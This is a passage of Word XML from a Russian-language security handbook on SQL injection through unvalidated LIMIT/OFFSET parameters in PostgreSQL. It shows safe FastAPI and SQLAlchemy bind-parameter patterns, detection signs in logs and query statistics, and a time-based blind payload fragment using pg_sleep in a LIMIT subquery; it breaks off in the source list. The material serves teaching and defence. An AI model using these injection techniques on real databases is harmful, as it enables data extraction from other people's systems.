    <w:p w14:paraId="3C84092C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Драйвер для Variant B (stacked):</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> simple-protocol режим (см. таблицу в 3.5.6).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3060B51A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Pre-condition в коде:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> user-controlled </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>limit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>offset</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> без </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>int()</w:t>
      </w:r>
      <w:r>
        <w:t>-cast, передаётся через string interpolation в SQL-builder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0910714D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Как выглядит легитимное использование.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Pagination через LIMIT/OFFSET — стандартный паттерн REST-API. Правильные шаблоны:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56D75C0E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># Шаблон 1: type-coerced query parameter + bind-параметр</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF3710F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>@router.get("/articles")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C451C78" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>async def list_articles(</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02622780" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    limit: int = Query(10, ge=1, le=100),    # ← int + range</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A920F61" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    offset: int = Query(0, ge=0),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2064A05C"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4F68A2A8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C34EF4A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    query = text("""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15CCF3C1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        SELECT id, title, published_at FROM articles</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72AFEEFA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        WHERE status = 'published'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626FF20B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        ORDER BY published_at DESC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BA56855" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        LIMIT :limit OFFSET :offset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13A08B01" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    """)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11015E3D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    result = await session.execute(query, {"limit": limit, "offset": offset})</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C88F876" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    return [dict(r._mapping) for r in result]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB0D0D0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73477E78" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t># Шаблон 2: ORM-уровень (SQLAlchemy 2.x)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CBC9AB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>stmt = select(Article).where(Article.status == 'published') \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D045333" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    .order_by(Article.published_at.desc()) \</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F8C092" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    .limit(limit).offset(offset)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="270049E0" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Query(10, ge=1, le=100)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в FastAPI делает три вещи: cast в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, проверка </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&gt;= 1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, проверка </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;= 100</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Bind-параметр </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>:limit</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> отправляется через extended protocol с явным integer-типом — payload-инъекция физически невозможна. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Article.limit(limit)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> в ORM делает то же самое автоматически.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511EEFFD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Признаки атаки:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AE9A00B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Статический сканер</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: f-string или </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>+</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-concat в окрестности </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LIMIT</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>OFFSET</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. В Python: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>f"LIMIT {var}"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>f"OFFSET {var}"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"LIMIT " + str(var)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. В JS: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>\</w:t>
      </w:r>
      <w:r>
        <w:t>LIMIT ${var}\`</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">. В Java: </w:t>
      </w:r>
      <w:r>
        <w:t>"LIMIT " + var`.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAD8562" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>`pg_stat_statements`</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: запросы вида </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>... LIMIT $1 UNION SELECT ...</w:t>
      </w:r>
      <w:r>
        <w:t>, где LIMIT-bind присутствует, но после него — UNION (нормальный pagination LIMIT-ом заканчивается). Любой UNION после LIMIT — критичный сигнал.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EE2F412" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HTTP access-log</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: query-string parameter </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>limit=</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>offset=</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> содержит non-numeric characters (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>%20</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UNION</w:t>
      </w:r>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03BA067F" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Application-логи</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: error </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cannot insert multiple commands into a prepared statement</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — индикатор попытки stacked queries (Variant B заблокирован extended-mode).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1297F335" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Response-size anomaly</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: при UNION-extraction response неожиданно содержит rows из других таблиц — резко больше байт, чем при обычном запросе с </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>limit=10</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A59ED27" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версии.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Все версии PG</w:t>
      </w:r>
      <w:r>
        <w:t>; LIMIT-expression context документирован с 7.x. Никакие фиксы не закрывают этот класс — это application-level mis-configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16EBD427" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Связанные паттерны.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70368D9E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.1 UNION-based</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — основной канал извлечения для Variant A. Граница: 3.1 — как формировать UNION-payload; 3.14.1 — куда его вставлять.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77E3E21A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.5 Stacked queries</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — Variant B зависит от driver-mode; см. таблицу 3.5.6 для конкретных драйверов.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C65FB73" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.4 Time-based blind</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LIMIT (SELECT CASE WHEN ... THEN 1 ELSE (SELECT 1 FROM pg_sleep(5)) END)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — time-channel через subquery в LIMIT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6C5C4B" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>3.14.3 ORDER BY column_number</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — тот же класс integer-context, но в другом clause.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1D8A48" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">•   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>5.7 Дополнительные приёмы валидации</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — общие шаблоны type-coercion и range-check для integer-параметров.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274EA853" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Источники.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9C4C86" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL Docs: «SELECT» / «LIMIT Clause» — https://www.postgresql.org/docs/current/sql-select.html#SQL-LIMIT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A307862" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
        <w:t>•   PostgreSQL Docs: «Combining Queries (UNION, INTERSECT, EXCEPT)» — https://www.postgresql.org/docs/current/queries-union.html</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30874149" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="200"/>
      </w:pPr>
      <w:r>
